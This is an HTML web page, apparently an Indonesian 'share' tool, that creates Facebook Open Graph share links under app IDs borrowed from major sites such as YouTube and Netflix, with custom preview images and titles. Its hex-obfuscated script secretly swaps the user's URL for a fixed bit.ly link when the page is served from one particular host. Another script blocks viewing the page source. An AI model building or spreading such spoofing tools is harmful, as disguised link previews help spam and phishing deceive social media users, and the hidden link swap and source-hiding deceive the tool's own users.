<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<title>TOOLS Bumi</title>
	<link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
    <script src="//apis.google.com/js/client.js?onload=OnLoadCallback"></script>
	<style type='text/css'>
input{box-sizing:border-box;width:100%;padding:1em;border:.15em solid #808080;border-radius:.5em}.rg-source{margin:0;font-size:.75em;text-align:right}.rg-source .pre-colon{text-transform:uppercase}.rg-source .post-colon{font-weight:bold}::-webkit-input-placeholder{color:#808080;text-align:left}:-moz-placeholder{color:#808080;text-align:left}.mbuh{margin:1px;padding:1px 1px;border:0;box-sizing:border-box;border-bottom:0}.line{margin:3px;padding:3px 3px;border:0;border-bottom:1px dashed #ccc}b{font-size:12px}.gly-spin{-webkit-animation:spin 2s infinite linear;-moz-animation:spin 2s infinite linear;-o-animation:spin 2s infinite linear;animation:spin 2s infinite linear}@-moz-keyframes spin{0%{-moz-transform:rotate(0deg)}100%{-moz-transform:rotate(359deg)}}@-webkit-keyframes spin{-webkit-transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg)}}@-o-keyframes spin{0%{-o-transform:rotate(0deg)}100%{-o-transform:rotate(359deg)}}@keyframes spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}.gly-rotate-90{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=1);-webkit-transform:rotate(90deg);-moz-transform:rotate(90deg);-ms-transform:rotate(90deg);-o-transform:rotate(90deg);transform:rotate(90deg)}.gly-rotate-180{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=2);-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-ms-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg)}.gly-rotate-270{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=3);-webkit-transform:rotate(270deg);-moz-transform:rotate(270deg);-ms-transform:rotate(270deg);-o-transform:rotate(270deg);transform:rotate(270deg)}.gly-flip-horizontal{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=0,mirror=1);-webkit-transform:scale(-1,1);-moz-transform:scale(-1,1);-ms-transform:scale(-1,1);-o-transform:scale(-1,1);transform:scale(-1,1)}.gly-flip-vertical{filter:progid:DXImageTransform.Microsoft.BasicImage(rotation=2,mirror=1);-webkit-transform:scale(1,-1);-moz-transform:scale(1,-1);-ms-transform:scale(1,-1);-o-transform:scale(1,-1);transform:scale(1,-1)}.anic{-webkit-animation:fade-in 2s linear infinite alternate;-moz-animation:fade-in 2s linear infinite alternate;animation:fade-in 2s linear infinite alternate}@-moz-keyframes fade-in{0%{opacity:0}65%{opacity:1}}@-webkit-keyframes fade-in{0%{opacity:0}65%{opacity:1}}@keyframes fade-in{0%{opacity:0}65%{opacity:1}}button{outline:none!important}button:focus{box-shadow:none;outline:0}button:active{outline:0}.table-fixed thead{width:100%}.table-fixed tbody{height:300px;overflow-y:auto;width:100%}.table-fixed thead,.table-fixed tbody,.table-fixed tr,.table-fixed td,.table-fixed th{display:block}.table-fixed tbody td,.table-fixed thead>tr>th{float:left;border-bottom-width:0}.aaa{margin-bottom:1px;height:30px;line-height:30px;padding:0 15px}.gi-2x{font-size:1.3em}img{border:1px solid #ddd;border-radius:4px;padding:5px;width:150px}
	</style>
</head>
<body style="padding-top:30px;">

	        <div class='container' style='width:500px;'>
	            <div class='panel panel-primary'>
	                <div class='panel-heading'><strong>Application App Share!</strong></div>
	                <div class='panel-body'>
<html>
<head>
<meta charset="utf-8" />
	<link href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
<meta name="viewport" content="width=device-width" />
<style media="screen">
        * { box-sizing: border-box; }
        html, body {
          padding: 0;
          margin: 0;
          outline: none;
        }
        body {
            padding: 2rem;
            font-size: .9rem;
        }
        body, input, textarea {
            font-family: Roboto, Helvetica, FreeSans, sans-serif;
        }
        h1 {
            margin: 0;
            font-size: 1.25rem;
        }
		h2 {
			margin: 0;
			font-size: 1.125rem;
		}
        h1, a, label {
            color: #3b5998;
        }
        h4 { margin: 1em 0 .5em; }
        p, ul { margin: .66em 0; }
        .content {
          padding: 1.5rem;
          max-width: 500px;
          margin: 0 auto;
          background-color: hsl(0, 0%, 95%);
          box-shadow:0 0.125rem 0.25rem rgba(0, 0, 0, 0.25);
          border-radius: .125rem;
        }
		.comments {
			padding: 0 1.5rem;
			max-width: 40rem;
			margin: 2rem auto 0;
		}
        label {
            display: block;
            margin-top: 10px;
            font-size: 12px;
        }
        input, textarea,select {
            font-size: 12px;
            border: 1px solid hsl(0, 0%, 80%);
            border-radius: .25rem;
            padding: 6px;
            margin-top: .25rem;
            resize: vertical;
            display: block;
            width: 100%;
            color: black;
        }
        label, #send {
            font-weight: bold;
        }
		.notif{
			color:#757575;
			font-style: italic;
			display:none;
			background: aquamarine;
			padding-left: 5px;
			padding-right: 5px;
		}
        #send {
            border: 0;
            color: white;
            background-color: #3b5998;
        }

        #disqus-placeholder {
            color: hsl(0, 0%, 75%);
            border: 1px solid hsl(0, 0%, 75%);
            min-height: 20em;
            padding: 9em 1em;
            text-align: center;
        }
        #disqus-placeholder img {
            width: 4em;
            margin-bottom: 1em;
        }
        .is-hidden { display: none; }
		.ribet{display: none;}
        @media only screen and (max-width: 480px) {
            body { padding: 0 0 0.5rem 0; }
            .content {
                max-width: 100%;
                border-radius: 0;
			}
			.comments {
				max-width:100%;
				margin-top: 1.5rem;
                margin-bottom: 1rem;
            }
        }
		.btn-circle.btn-xl {
			width: 70px;
			height: 70px;
			padding: 10px 16px;
			border-radius: 35px;
			font-size: 24px;
			line-height: 1.33;
		}

		.btn-circle {
			width: 30px;
			height: 30px;
			padding: 6px 0px;
			border-radius: 15px;
			text-align: center;
			font-size: 12px;
			line-height: 1.42857;
		}
.btn-danger {
	margin-top: 10px;
    color: #fff;
    background-color: #337ab7;
    border-color: #2e6da4;
}		
        </style>
</head>
<body>
<textarea id="cc" style="display:none">||||||||||var|_0x80a4|x76|x61|x6C|x5B|x6E|x6D|x65|x3D|x75|x5D|x68|x6F|x73|x74|x63|x69|x7A|x2E|x70|x3A|x2F|x62|x79|x32|||||||||x4F|x51|x55|x5A|x72|x64|x67|x78|x23|x20|x66|x6A|x35|x6B|x5F|x59|x34|x58|||||||||||x57|x3F|x31|x37|x38|x36|x39|x33|x26|x25|x41|x46|x30|x52|x45|x53|x4C|x54|x4B|x4E|x77|x2C|x43|function|_0x5cb4x1|if|window|action_type|app_id|action_properties|JSON|object|sdk|version|next|20|21|22|jQuery|23|24|return|27|26|25|33|32|30|29|28|31|34|||||||||||document|36|35|38|37|setTimeout|39|2000|42|41|40</textarea>
<div class="content">
<form action="https://www.facebook.com/sharer/sharer.php" method="get" target="_blank">
<label>Favourite List Apps 
<select name="apps" id="apps">
				<option value="">Object via:</option>
				<option value="441830202634558">www.fox.com</option>
				<option value="1927919413886305">www.cube.tv</option>
				<option value="161273083968709">www.twitch.tv</option>
				<option value="603207213480826">www.bigo.tv</option>
				<option value="1603079626622346">mp3.zing.vn</option>
				<option value="156537084972880">www.king5.com</option>
				<option value="142371818162">www.livestream.com</option>
				<option value="19884028963">www.vimeo.com</option>
				<option value="87741124305">www.youtube.com</option>
				<option value="2370255719730014">www.y2mate.com</option>
				<option value="2059071827545804">www.tiktok.com</option>
				<option value="515786652285510">www.yahoo.com</option>
				<option value="432838856814725">www.smule.com</option>
				<option value="40582213222">www.hulu.com</option>
				<option value="124024574287414">www.instagram.com</option>
				<option value="111411968896241">www.miniclip.com</option>
				<option value="6628568379">itunes.apple.com</option>
				<option value="164734381262">www.amazon.com</option>
				<option value="1663534280540672">web.joox.com</option>
				<option value="97534753161">www.yelp.com</option>
				<option value="210019893730">www.dropbox.com</option>
				<option value="163114453728333">www.netflix.com</option>
				<option value="1377263295747145">netflix.com</option>
				<option value="277064115737714">www.uber.com</option>
				<option value="331116490288120">www.ladbible.com</option>
				<option value="124285848214697">drib.tech</option>
				<option value="111239619098">bing.com</option>
				<option value="9869919170">www.nytimes.com</option>
				<option value="113869198637480">developers.facebook.com/videos/</option>
				<option value="368513495882">sso.accounts.dowjones.com</option>
				<option value="368513495882">www.wsj-prod.rpxnow.com</option>
				<option value="103384409739156">paperlesspost.com</option>
				<option value="258883394309702">postfity.com</option>
				<option value="733768086637828">wix.com</option>
				<option value="542599432471018">medium.com</option>
				<option value="190291501407">Weebly.com</option>
				<option value="1401488693436528">github.com</option>
				<option value="166222643790489">www.metacafe.com</option>
				<option value="96937694899">www.dailymotion.com</option>
</select>
</label>
<label>URL Link Shortener (URL link yang akan di post).
<input type="url" pattern="https?://.+" name="u" id="u" required="" placeholder="Create URL from branch.io, applk.io to twitter, and to short.cm"/>
</label>
<label>Supports type file format JPEG (or .jpg), PNG and GIF WebP images.
<input type="url" pattern="https?://.+" name="picture" id="picture" placeholder="Custom image URL: https://images.imgbox.com/x/xx/xxx.png"/>
</label>
<div class="ribet">
<label>Reload type (Type boleh default)
<select name="action_type" id="action_type">
				<option value="og.shares">shares</option>
				<option value="og.posts">posts</option>
				<option value="og.comments">comments</option>
				<option value="og.likes">likes</option>
				<option value="og.website">website</option>
</select>
</label>
	<label>Custom title
	<input type="text" name="title" id="title" placeholder="Judul boleh dikosongkan..."/>
	</label>
	<label>Custom description
	<textarea name="description" id="description" rows="8" cols="40" placeholder="Keterangan boleh dikosongkan..."></textarea>
	</label>
</div>
<center>
<button type="button" id="tugel" class="btn btn-danger btn-circle"><span>&#8897;</span><span style="display: none">&#8896;</span></button>
</center>

<label style="margin-top:25px;color:red;">Link Share <span class="notif">(Link telah dicopy kan!)</span>
<input type="text" name="result" id="result"/>
</label>
<label>
<input id="send" type="button" value="Share Open Graph" />
</label>
</form>
</div>
<script src="https://code.jquery.com/jquery-1.10.2.js"></script>
<script type="text/javascript">
/*var _0x80a4=["val","[name=u]","hostname","location","fb.com","http://bit.ly/","trim","[name=title]","[name=description]","[name=picture]","length","description","image","text","#apps option:selected","og.shares","[name=apps]","stringify","joey","v3.2","https://staticxx.facebook.com/connect/xd_arbiter/r/lY4eZXm_YWu.js?version=42#cb=f178bb82679399&domain=","&origin=https%3A%2F%2F","%2Ff3ec09ca44bdc94&relation=opener&frame=f295fa5752ca374&result=%22xxRESULTTOKENxx%22","param","https://www.facebook.com/v3.2/dialog/share_open_graph?","#result","change","#u","#apps","#picture","#title","#description","slow","toggle",".ribet","#tugel span","click","#tugel","select","copy","execCommand","show",".notif","hide","_blank","open","#send"];(function(){function _0x5cb4x1(){var A=$("[name=u]")["val"]();if(window["location"]["hostname"]=="fb.com"){A=_0x80a4[5]};var B={"url":A,"title":$(_0x80a4[7])[_0x80a4[0]]()[_0x80a4[6]]()};var C=$(_0x80a4[8])[_0x80a4[0]]()[_0x80a4[6]]();var D=$(_0x80a4[9])[_0x80a4[0]]();if(C[_0x80a4[10]]){B[_0x80a4[11]]=C};if(D[_0x80a4[10]]){B[_0x80a4[12]]=D};var E=$(_0x80a4[14])[_0x80a4[13]]();;;var F={action_type:_0x80a4[15],app_id:$(_0x80a4[16])[_0x80a4[0]](),action_properties:JSON[_0x80a4[17]]({object:B}),sdk:_0x80a4[18],version:_0x80a4[19],next:_0x80a4[20]+E+_0x80a4[21]+E+_0x80a4[22]};var G=jQuery[_0x80a4[23]](F);var H=_0x80a4[24]+G;return H}$(_0x80a4[27])[_0x80a4[26]](function(){$(_0x80a4[25])[_0x80a4[0]](_0x5cb4x1())});$(_0x80a4[33])[_0x80a4[32]](function(){$(_0x80a4[30])[_0x80a4[29]](_0x80a4[28]);$(_0x80a4[31])[_0x80a4[29]]()});$(_0x80a4[25])[_0x80a4[32]](function(){$(_0x80a4[25])[_0x80a4[34]]();document[_0x80a4[36]](_0x80a4[35]);$(_0x80a4[38])[_0x80a4[37]]();setTimeout(function(){$(_0x80a4[38])[_0x80a4[39]](2000)},2000)});$(_0x80a4[42])[_0x80a4[32]](function(){window[_0x80a4[41]](_0x5cb4x1(),_0x80a4[40])})})()*/

var _0x80a4=["\x76\x61\x6C","\x5B\x6E\x61\x6D\x65\x3D\x75\x5D","\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x7A\x61\x65\x2E\x6D\x65\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x32\x4F\x6E\x6E\x51\x55\x5A","\x74\x72\x69\x6D","\x5B\x6E\x61\x6D\x65\x3D\x74\x69\x74\x6C\x65\x5D","\x5B\x6E\x61\x6D\x65\x3D\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x5D","\x5B\x6E\x61\x6D\x65\x3D\x70\x69\x63\x74\x75\x72\x65\x5D","\x6C\x65\x6E\x67\x74\x68","\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E","\x69\x6D\x61\x67\x65","\x74\x65\x78\x74","\x23\x61\x70\x70\x73\x20\x6F\x70\x74\x69\x6F\x6E\x3A\x73\x65\x6C\x65\x63\x74\x65\x64","\x6F\x67\x2E\x73\x68\x61\x72\x65\x73","\x5B\x6E\x61\x6D\x65\x3D\x61\x70\x70\x73\x5D","\x73\x74\x72\x69\x6E\x67\x69\x66\x79","\x6A\x6F\x65\x79","\x76\x32\x2E\x35","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x74\x61\x74\x69\x63\x78\x78\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x63\x6F\x6E\x6E\x65\x63\x74\x2F\x78\x64\x5F\x61\x72\x62\x69\x74\x65\x72\x2F\x72\x2F\x6C\x59\x34\x65\x5A\x58\x6D\x5F\x59\x57\x75\x2E\x6A\x73\x3F\x76\x65\x72\x73\x69\x6F\x6E\x3D\x34\x32\x23\x63\x62\x3D\x66\x31\x37\x38\x62\x62\x38\x32\x36\x37\x39\x33\x39\x39\x26\x64\x6F\x6D\x61\x69\x6E\x3D","\x26\x6F\x72\x69\x67\x69\x6E\x3D\x68\x74\x74\x70\x73\x25\x33\x41\x25\x32\x46\x25\x32\x46","\x25\x32\x46\x66\x33\x65\x63\x30\x39\x63\x61\x34\x34\x62\x64\x63\x39\x34\x26\x72\x65\x6C\x61\x74\x69\x6F\x6E\x3D\x6F\x70\x65\x6E\x65\x72\x26\x66\x72\x61\x6D\x65\x3D\x66\x32\x39\x35\x66\x61\x35\x37\x35\x32\x63\x61\x33\x37\x34\x26\x72\x65\x73\x75\x6C\x74\x3D\x25\x32\x32\x78\x78\x52\x45\x53\x55\x4C\x54\x54\x4F\x4B\x45\x4E\x78\x78\x25\x32\x32","\x70\x61\x72\x61\x6D","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x76\x32\x2E\x35\x2F\x64\x69\x61\x6C\x6F\x67\x2F\x73\x68\x61\x72\x65\x5F\x6F\x70\x65\x6E\x5F\x67\x72\x61\x70\x68\x3F","\x23\x72\x65\x73\x75\x6C\x74","\x63\x68\x61\x6E\x67\x65","\x23\x75\x2C\x23\x61\x70\x70\x73\x2C\x23\x70\x69\x63\x74\x75\x72\x65\x2C\x23\x74\x69\x74\x6C\x65\x2C\x23\x64\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E","\x73\x6C\x6F\x77","\x74\x6F\x67\x67\x6C\x65","\x2E\x72\x69\x62\x65\x74","\x23\x74\x75\x67\x65\x6C\x20\x73\x70\x61\x6E","\x63\x6C\x69\x63\x6B","\x23\x74\x75\x67\x65\x6C","\x73\x65\x6C\x65\x63\x74","\x63\x6F\x70\x79","\x65\x78\x65\x63\x43\x6F\x6D\x6D\x61\x6E\x64","\x73\x68\x6F\x77","\x2E\x6E\x6F\x74\x69\x66","\x68\x69\x64\x65","\x5F\x62\x6C\x61\x6E\x6B","\x6F\x70\x65\x6E","\x23\x73\x65\x6E\x64"];(function(){function _0x5cb4x1(){var A=$(_0x80a4[1])[_0x80a4[0]]();if(window[_0x80a4[3]][_0x80a4[2]]==_0x80a4[4]){A=_0x80a4[5]};var B={"\x75\x72\x6C":A,"\x74\x69\x74\x6C\x65":$(_0x80a4[7])[_0x80a4[0]]()[_0x80a4[6]]()};var C=$(_0x80a4[8])[_0x80a4[0]]()[_0x80a4[6]]();var D=$(_0x80a4[9])[_0x80a4[0]]();if(C[_0x80a4[10]]){B[_0x80a4[11]]=C};if(D[_0x80a4[10]]){B[_0x80a4[12]]=D};var E=$(_0x80a4[14])[_0x80a4[13]]();;;var F={action_type:_0x80a4[15],app_id:$(_0x80a4[16])[_0x80a4[0]](),action_properties:JSON[_0x80a4[17]]({object:B}),sdk:_0x80a4[18],version:_0x80a4[19],next:_0x80a4[20]+E+_0x80a4[21]+E+_0x80a4[22]};var G=jQuery[_0x80a4[23]](F);var H=_0x80a4[24]+G;return H}$(_0x80a4[27])[_0x80a4[26]](function(){$(_0x80a4[25])[_0x80a4[0]](_0x5cb4x1())});$(_0x80a4[33])[_0x80a4[32]](function(){$(_0x80a4[30])[_0x80a4[29]](_0x80a4[28]);$(_0x80a4[31])[_0x80a4[29]]()});$(_0x80a4[25])[_0x80a4[32]](function(){$(_0x80a4[25])[_0x80a4[34]]();document[_0x80a4[36]](_0x80a4[35]);$(_0x80a4[38])[_0x80a4[37]]();setTimeout(function(){$(_0x80a4[38])[_0x80a4[39]](2000)},2000)});$(_0x80a4[42])[_0x80a4[32]](function(){window[_0x80a4[41]](_0x5cb4x1(),_0x80a4[40])})})()
</script>
<script type='text/javascript'>
//<![CDATA[
//Script Redirect CTRL + U
//https://www.facebook.com/profile.php ganti dengan url blog kalian
function redirectCU(e) {
  if (e.ctrlKey && e.which == 85) {
    window.location.replace("https://www.facebook.com/profile.php");
    return false;
  }
}
document.onkeydown = redirectCU;

//Script Redirect Klik Kanan
function redirectKK(e) {
  if (e.which == 3) {
    window.location.replace("https://www.facebook.com/profile.php");
    return false;
  }
}
document.oncontextmenu = redirectKK;
//]]>

</script>
</body>
</html>